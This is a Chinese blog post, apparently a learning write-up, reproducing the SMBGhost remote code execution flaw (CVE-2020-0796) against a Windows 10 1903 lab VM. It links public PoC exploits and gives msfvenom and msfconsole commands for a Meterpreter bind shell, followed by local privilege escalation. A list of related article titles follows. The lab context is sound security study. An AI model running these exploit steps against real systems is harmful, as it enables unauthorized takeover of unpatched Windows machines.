CVE-2020-0796漏洞复现
网上现在已经有很多复现的文章了,我也做一个学习总结。
0x00 漏洞描述
2020年3月10日,微软在其官方SRC发布了CVE-2020-0796的安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码。
0x01 影响范围
- Windows 10 Version 1903 for 32-bit Systems
- Windows 10 Version 1903 for x64-based Systems
- Windows 10 Version 1903 for ARM64-based Systems
- Windows Server, Version 1903 (Server Core installation)
- Windows 10 Version 1909 for 32-bit Systems
- Windows 10 Version 1909 for x64-based Systems
- Windows 10 Version 1909 for ARM64-based Systems
- Windows Server, Version 1909 (Server Core installation)
0x02 准备工作
Win10 1903的镜像:cn_windows_10_consumer_editions_version_1903_updated_sept_2019_x64_dvd_ef681fec.iso_免费高速下载|百度网盘-分享无限制
漏洞检测工具: https://github.com/ollypwn/SMBGhost
奇安信检测工具: http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
蓝屏POC: https://github.com/eerykitty/CVE-2020-0796-PoC
本地提权POC:https://github.com/danigargu/CVE-2020-0796/releases/download/v1.0/cve-2020-0796-local_static.zip
远程漏洞利用POC:https://github.com/chompie1337/SMBGhost_RCE_PoC
0x03 漏洞复现
首先注意不是任意Win10都存在该漏洞,注意对应版本,Vmware安装完镜像后,需要关闭防火墙,不然主机的流量无法过去。选择“打开网络和Internet设置”
点击“Windows防火墙”,将以下三个网络全部关闭,之后进行漏洞检测和利用。
Win10虚拟机IP此时为192.168.194.137
1)漏洞检测的两个工具,第一个利用方式
第二个奇安信的工具的利用方式,可进行批量检测
2)蓝屏POC脚本执行前需安装需要的库pip install ntlm_auth,python3环境下运行,运行后虚拟机立马就蓝屏重启了。
3)本地提权POC,需要将exe文件上传到目标机器,但不具备免杀效果,所以需要关闭杀毒。
在目标机器上运行exe文件会弹出一个system权限的shell对话框,成功提权。
4)远程漏洞利用POC
1-首先使用Kali的msfvenom生成一个python类型正向连接的shellcode。
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python
2-将生成的 shellcode 替换 POC 中 exploit.py 里的USER_PAYLOAD字段,注意要将buf替换为USER_PAYLOAD,同时注意msfvenom生成的shellcode比exploit.py里原有多几行,需自行添加补齐。
3-msfconsole开启监听端口
use exploit/multi/handler set payload windows/x64/meterpreter/bind_tcp options set rhost 192.168.194.137 run
4-运行exploit.py 执行命令: python exploit.py -ip 192.168.194.137
过程中需要多执行几次,经常会出现“[-] physical read primitive failed!”的语句就终止了。
5-当成功运行起来后,出现到“[+] Press a key to execute shellcode!”执行shellcode按下“Enter”时,会大概率把Win10打蓝屏重启,其中一次没有重启,但Kali中的监听端口却没有收到Shell,按下【Ctrl】+【C】,再重新执行run命令,就会收到meterpreter的Shell了。
6-拿到Shell后可结合本地提权的POC,在关掉杀毒,防火墙的情况下运行进行提权。
CVE-2020-0796漏洞复现相关推荐
- CVE(2017-15715、2021-41773、2021-40438)漏洞复现
仅用于学习参考,不要贪玩哦(*^▽^*) 目录 CVE-2017-15715 漏洞介绍 漏洞复现 CVE-2021-41773 漏洞介绍 漏洞复现 CVE-2021-40438 漏洞介绍 漏洞复现 一 ...
- android 动画 最顶层_【Android编程实战】StrandHogg漏洞复现及原理分析_Android系统上的维京海盗...
0x00 StrandHogg漏洞详情 StrandHogg漏洞 CVE编号:暂无 [漏洞危害] 近日,Android平台上发现了一个高危漏洞 该漏洞允许攻击者冒充任意合法应用,诱导受害者授予恶意应用 ...
- php打开网页执行即执行bat程序_CVE202011107:XAMPP任意命令执行漏洞复现
0x00简介 XAMPP是一个把Apache网页服务器与PHP.Perl及MariaDB集合在一起的安裝包,允许用戶可以在自己的电脑上轻易的建立网页服务器.该软件与phpstudy类似. 2020年4 ...
- MS08-067远程代码执行漏洞(CVE-2008-4250) | Windows Server服务RPC请求缓冲区溢出漏洞复现
MS08-067远程代码执行漏洞(CVE-2008-4250) | Windows Server服务RPC请求缓冲区溢出漏洞复现 文章目录 MS08-067远程代码执行漏洞(CVE-2008-4250 ...
- CVE-2019-1388 Windows UAC 漏洞复现
CVE-2019-1388 Windows UAC 漏洞复现 文章目录 CVE-2019-1388 Windows UAC 漏洞复现 1. 概述 1.1 UAC 1.2 漏洞简述 1.3 风险等级 1 ...
- Linux Privilege Escalation Kernel Exploits | Linux本地内核提权漏洞复现 CVE-2015-1328
Linux Privilege Escalation Kernel Exploits | Linux本地内核提权漏洞复现 CVE-2015-1328 文章目录 Linux Privilege Esca ...
- java rmi漏洞工具_学生会私房菜【20200924】Weblogic WLS核心组件反序列化命令执行突破(CVE20182628)漏洞复现...
学生会私房菜 学生会私房菜是通过学生会信箱收集同学们的来稿,挑选其中的优质文档,不定期进行文档推送的主题. 本期文档内容为:Weblogic WLS核心组件反序列化命令执行突破(CVE-2018-26 ...
- 查看openssh版本_OpenSSH命令注入漏洞复现(CVE202015778)
OpenSSH命令注入漏洞复现(CVE-2020-15778) 目录 漏洞描述 漏洞等级 漏洞影响版本 漏洞复现 修复建议 ▶漏洞描述 OpenSSH是用于使用SSH协议进行远程登录的一个开源实现.通 ...
- cve-2020-0796_CVE20200796 | Windows SMBv3客户端/永痕之黑漏洞复现
0x01 漏洞介绍 2020年3月10日,微软在其官方SRC发布了CVE-2020-0796的安全公告(ADV200005,Microsoft Guidance for Disabling SMBv3 ...
- openssh漏洞_技术干货 | OpenSSH命令注入漏洞复现(CVE202015778)
本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表安全+的观点,若有无意侵权或转载不当之处请联系我们处理,谢谢合作! 欢迎各位添加 ...
最新文章
- odbc 函数序列错误_python时间序列:移动窗口函数前篇
- Java程序设计进阶之路一:捕捉异常
- delphi 打包工具_每年帮你省钱20万的砖头打包方式,是你想要的吗?
- Android实现文件下载并自动安装apk包
- 带你学python基础:面向对象编程
- mysql 编码和汉字存储占用字节问题的探索
- hadoop环境搭建遇到的问题:-bash: jps: command not found
- samba配置不同用户不同权限_前端问题集:vue配置环境-给不同的环境配不同的打包命令...
- Java学习笔记——JDBC读取properties属性文件
- 职称计算机怎么练,2017职称计算机windows操作训练题
- 北京上海等昨天大规模断网 专家称与太阳无关
- 自定义ContentProvider
- mysql的数据备份及恢复
- hadoop面试题汇总
- 苹果ipad邮箱找不到服务器,ipad怎么设置qq邮箱?苹果ipad qq邮箱设置教程
- 木子-数据库-sqlServer数据库安装方式
- Python自动化整理文件“大升级”,任意路径下文件,都给你整理的明明白白!...
- Python数据分析到底可以用来做什么?
- Web3+品牌的大杀器:DAO如何实现对传统品牌彻底的降维打击
- 追女孩的九大禁忌!!!